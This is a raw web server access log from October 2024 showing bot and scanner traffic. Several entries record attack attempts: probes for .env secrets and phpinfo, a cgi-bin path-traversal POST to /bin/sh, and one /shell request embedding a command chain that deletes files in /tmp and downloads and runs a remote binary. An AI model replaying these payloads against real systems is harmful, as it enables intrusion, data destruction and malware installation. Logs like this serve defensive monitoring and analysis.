78.153.140.177 - - [02/Oct/2024:04:38:55 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Lenovo-A390t_TD/S100 Release/11.2012 Mozilla/5.0 (Linux; U; Android 4.0.3) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [02/Oct/2024:04:38:56 +0200] "GET /.env.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
78.153.140.177 - - [02/Oct/2024:04:38:56 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre"
141.98.11.15 - - [02/Oct/2024:04:39:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
158.51.126.152 - - [02/Oct/2024:04:42:09 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.23.236.82/bins/mips;sh+/bins/mips HTTP/1.1" 404 306 "-" "Hello, world"
69.164.217.245 - - [02/Oct/2024:04:43:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.13 - - [02/Oct/2024:04:44:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.152.110.10 - - [02/Oct/2024:04:48:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
93.174.93.12 - - [02/Oct/2024:04:49:12 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [02/Oct/2024:04:49:27 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [02/Oct/2024:04:49:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [02/Oct/2024:04:49:42 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
146.190.102.143 - - [02/Oct/2024:04:50:10 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
141.98.11.15 - - [02/Oct/2024:04:50:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.126.202.234 - - [02/Oct/2024:04:54:09 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
149.50.103.48 - - [02/Oct/2024:04:55:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.15 - - [02/Oct/2024:04:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.180.140.103 - - [02/Oct/2024:04:56:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
141.98.11.15 - - [02/Oct/2024:04:58:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
202.74.246.172 - - [02/Oct/2024:04:59:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
198.235.24.60 - - [02/Oct/2024:05:01:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
